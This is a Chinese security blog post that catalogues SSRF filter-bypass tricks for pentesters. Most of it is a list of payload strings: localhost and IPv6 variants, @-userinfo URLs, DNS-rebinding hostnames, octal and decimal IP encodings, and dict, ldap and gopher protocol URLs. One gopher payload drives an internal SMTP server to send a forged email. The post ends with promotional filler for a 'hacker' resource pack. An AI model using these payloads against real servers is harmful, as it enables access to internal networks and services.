SSRF绕过方法总结,从零基础到精通,收藏这篇就够了!

最新推荐文章于 2025-08-26 10:56:19 发布
原创 最新推荐文章于 2025-08-26 10:56:19 发布 · 1.1k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络 #xss #数据库

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

1、攻击本地

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div></pre></td><td><pre>     
 <div>
  
  http://127.0.0.1:80
 
 </div>
 
 <div>
  
  http://localhost:22
 
 </div></pre></td></tr></tbody></table>

2、利用[::]

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div>
 
 <div>
  
  3
 
 </div></pre></td><td><pre>     
 <div>
  
  利用[::]绕过localhost
 
 </div>
 
 <div>
  
  http://[::]:80/  &gt;&gt;&gt;  http://127.0.0.1
 
 </div>
 
 <div>
  
  也有看到利用http://0000::1:80/的,但是我测试未成功
 
 </div></pre></td></tr></tbody></table>

3、利用@

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://example.com@127.0.0.1
 
 </div></pre></td></tr></tbody></table>

4、利用短地址

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://dwz.cn/11SMa  &gt;&gt;&gt;  http://127.0.0.1
 
 </div></pre></td></tr></tbody></table>

5、利用特殊域名

利用的原理是DNS解析

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://127.0.0.1.xip.io/
 
 </div></pre></td></tr></tbody></table>



     

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://www.owasp.org.127.0.0.1.xip.io/
 
 </div></pre></td></tr></tbody></table>

6、利用DNS解析

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  在域名上设置A记录,指向127.0.1
 
 </div></pre></td></tr></tbody></table>

7、利用上传

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div>
 
 <div>
  
  3
 
 </div>
 
 <div>
  
  4
 
 </div></pre></td><td><pre>     
 <div>
  
  也不一定是上传,我也说不清,自己体会 -.-
 
 </div>
 
 <div>
  
  修改"type=file"为"type=url"
 
 </div>
 
 <div>
  
  比如:
 
 </div>
 
 <div>
  
  上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF
 
 </div></pre></td></tr></tbody></table>

8、利用Enclosed alphanumerics

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div>
 
 <div>
  
  3
 
 </div>
 
 <div>
  
  4
 
 </div></pre></td><td><pre>     
 <div>
  
  利用Enclosed alphanumerics
 
 </div>
 
 <div>
  
  ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  &gt;&gt;&gt;  example.com
 
 </div>
 
 <div>
  
  List:
 
 </div>
 
 <div>
  
  ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 
 </div></pre></td></tr></tbody></table>

9、利用句号

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  127。0。0。1  &gt;&gt;&gt;  127.0.0.1
 
 </div></pre></td></tr></tbody></table>

10、利用进制转换

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div>
 
 <div>
  
  3
 
 </div>
 
 <div>
  
  4
 
 </div>
 
 <div>
  
  5
 
 </div></pre></td><td><pre>     
 <div>
  
  可以是十六进制,八进制等。
 
 </div>
 
 <div>
  
  115.239.210.26  &gt;&gt;&gt;  16373751032
 
 </div>
 
 <div>
  
  首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
 
 </div>
 
 <div>
  
  然后把 73efd21a 这十六进制一起转换成8进制
 
 </div>
 
 <div>
  
  记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
 
 </div></pre></td></tr></tbody></table>



     

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://127.0.0.1  &gt;&gt;&gt;  http://0177.0.0.1/
 
 </div></pre></td></tr></tbody></table>



     

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://127.0.0.1  &gt;&gt;&gt;  http://2130706433/
 
 </div></pre></td></tr></tbody></table>



     

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div></pre></td><td><pre>     
 <div>
  
  http://192.168.0.1  &gt;&gt;&gt;  http://3232235521/
 
 </div>
 
 <div>
  
  http://192.168.1.1  &gt;&gt;&gt;  http://3232235777/
 
 </div></pre></td></tr></tbody></table>

11、利用特殊地址

     
     
     


      
  1
 
 </div></pre></td><td><pre>     
 <div>
  
  http://0/
 
 </div></pre></td></tr></tbody></table>

12、利用协议

     
     
     


      
  1
 
 </div>
 
 <div>
  
  2
 
 </div>
 
 <div>
  
  3
 
 </div>
 
 <div>
  
  4
 
 </div>
 
 <div>
  
  5
 
 </div>
 
 <div>
  
  6
 
 </div>
 
 <div>
  
  7
 
 </div>
 
 <div>
  
  8
 
 </div>
 
 <div>
  
  9
 
 </div>
 
 <div>
  
  10
 
 </div>
 
 <div>
  
  11
 
 </div></pre></td><td><pre>     
 <div>
  
  Dict://
 
 </div>
 
 <div>
  
  dict://&lt;user-auth&gt;@&lt;host&gt;:&lt;port&gt;/d:&lt;word&gt;
 
 </div>
 
 <div>
  
  ssrf.php?url=dict://attacker:11111/
 
 </div>
 
 <div>
  
  SFTP://
 
 </div>
 
 <div>
  
  ssrf.php?url=sftp://example.com:11111/
 
 </div>
 
 <div>
  
  TFTP://
 
 </div>
 
 <div>
  
  ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
 
 </div>
 
 <div>
  
  LDAP://
 
 </div>
 
 <div>
  
  ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 
 </div>
 
 <div>
  
  Gopher://
 
 </div>
 
 <div>
  
  ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
 
 </div></pre></td></tr></tbody></table>

13、使用组合

各种绕过的组合即可

作者:瓦都剋,来源:http://byd.dropsec.xyz/

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包,需要点击下方链接即可前往获取

读者福利 | 优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
在这里插入图片描述

在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)
在这里插入图片描述

在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

在这里插入图片描述

黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

读者福利 | 优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

【Burp入门第二十】使用BurpSuite实现SSRF+实战案例
等风来
04-07 2707
允许用户输入一个URL,然后在服务器端通过发起HTTP请求来获取该URL的内容并显示给用户。如果网站没有对URL进行验证,通过输入。SSRF漏洞:向服务器发送伪造请求即可访问或操作服务器上的资源。,即可获取到内部系统的敏感信息,如管理员页面的内容。故我们可以尝试找到该服务器上存在的路径。以下步骤可证明某站点是否存在SSRF。故可证明该站点存在SSRF。【案例2】外带盲SSRF
【2024最】网络安全从入门到精通(超详细)学习路线
abao6690的博客
06-05 1180
【2024最】网络安全从入门到精通(超详细)学习路线
ssrf漏洞waf绕过
My笔记的博客
04-05 1080
(1)扫描内部网络利用多线程脚本去fuzz可用的端口或者服务。(2)向内部的任意主机和任意端口发送精心构造的数据包。举个例子(soapclient类+crlf漏洞给内网发送任意数据包利用http攻击redis)(3)wordpress开启xmlrpc利用pingback.ping方法造成ddos漏洞。或者请求大文件,始终保持连接keep-alive always(4)利用协议进行暴力穷举(5)如果不知道一个cms是什么cms,让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms。
ssrf绕过方式
weixin_67840381的博客
08-27 1710
DNS是Domain Name Service的缩写,计算机域名服务器,在Internet上域名与IP地址之间是一一对应的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,而域名解析需要由专门的域名解析服务器来完成,这就是DNS域名服务器。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。
SSRF漏洞详解
热门推荐
qq_48904485的博客
03-22 2万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
ssrf绕过
2302_79119987的博客
04-12 3035
1、同源策略/SOP(Same origin policy)是一种约定,由 Netscape 公司 1995 年引入浏览器,它是浏览器最核心也最基本的安全功能,现在所有支持 JavaScript 的浏览器都会使用这个策略。2、在这个策略下,web浏览器允许第一个页面的脚本访问第二个页面里的数据,但是也只有在两个页面有相同的源时。开头,因为http://www.baidu.com@127.0.0.1/与http://127.0.0.1请求的页面一致,考虑用这种结构来绕过本来的地址应该是。
SSRF绕过IP限制方法总结
weixin_30575309的博客
09-04 1440
SSRF绕过IP限制方法总结 - Summary of SSRF methods for bypassing IP restrictions -https://www.cnblogs.com/iAmSoScArEd/p/11458850.html 一、SSRF简介 SSRF(Server-Side Request Forgery,服务器端请求伪造):通俗的来说就是我们可以伪造服务器...
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 2089
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
MSF从入门到渗透,零基础小白到精通(超详细),看这一了!
weixin_57514792的博客
08-26 852
MSF从入门到渗透,零基础小白到精通(超详细),看这一了!
想参加【25年】的护网行动,别错过这份HVV蓝队初级面试合集(超详细)零基础入门到精通收藏这一了!
zz96405784848的博客
07-15 1148
本文总结了天眼设备相关面试问题和SQL注入漏洞知识。在天眼部分,详细解答了设备字段含义、告警分析、日志检索等20多个常见问题,包括DNS协议解析、威胁告警处理、主机外联排查等实战场景。SQL注入部分系统梳理了注入原理、分类(盲注、堆叠注入等)、利用函数(updatexml、load_file)及绕过技巧(编码、注释等),并提供了联合注入的标准操作步骤。内容涵盖护网蓝队初级岗位的核心技术点,适合安全工程师复习备考或日常参考。
ssrf绕过
HoAd'blog
08-16 2100
ssrf绕过 当涉及到SSRF(服务器端请求伪造)时,可以使用以下5种有效负载绕过防御: 1)使用CIDR绕过SSRF: http://127.127.127.127 http://127.0.0.0 2)使用稀有地址绕行: http://127.1 http://0 3)使用技巧组合绕过: http://1.1.1.1&@2.2.2.2# @3.3.3.3/ urllib: 3.3.3.3 4)绕过弱解析器: http://127.1.1.1:80\@127.2.2.2:80/ 5)用[
SSRF漏洞的多种绕过方式与防御手段
告白的博客
03-14 9075
SSRF即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。
WAF攻防之SSRF绕过
weixin_34248849的博客
05-17 1112
前言 简单整理一下漏洞中ssrf绕过的一些方法,希望在渗透测试中有更清晰的思路。 什么是SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造)是从服务端获取其他服务器信息的的功能。使用指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的Web应用作为代理,访问内网,攻击远程服务器,读取敏感信息等...
ssrf绕过(转载)
Naptmn的博客
02-16 285
https://www.secpulse.com/archives/65832.html
SSRF常见绕过思路
2ed
10-11 8365
搜集的网上常见SSRF绕过思路 @绕过 http://www.baidu.com@10.10.10.10与http://10.10.10.10请求是相同的 该请求得到的内容都是10.10.10.10的内容,此绕过同样在URL跳转绕过中适用。 360会阻止这种访问方式,访问显示空白页, firefox、chrome可以这样访问 ip地址转换绕过 有些ssrf防护措施,会对输入的URL做正则匹配,限...
SSRF其它绕过和攻击利用
m0_73927535的博客
04-11 2573
构造数据 gopher提交数据:
SSRF中的绕过姿势
bylfsj的博客
10-26 812
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
SSRF漏洞深入利用与防御方案绕过技巧
道阻且长,行则将至
07-11 3110
本文借助 CTFHub 与 portswigger 两个 SSRF 靶场,实践练习了 SSRF 漏洞的基础利用(内网访问、文件读取、端口探测)和进阶利用(Gopher 协议发送 post 请求、攻击 Redis 实现 RCE 等),最后实践了常见的防御方案绕过手段(黑白名单绕过、重定向、DNS 绑定等)。
ssrf绕过和防御
最新发布
09-11
在构建回答时,我会把绕过方法按技术原理分层:从基础的URL变形到网络层攻击,再到应用层欺骗。防御部分则强调层次化——既要堵漏洞也要降危害。特别要注意引用[1][^1]和引用[3][^3]强调的"深度防御"理念,比如网络...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值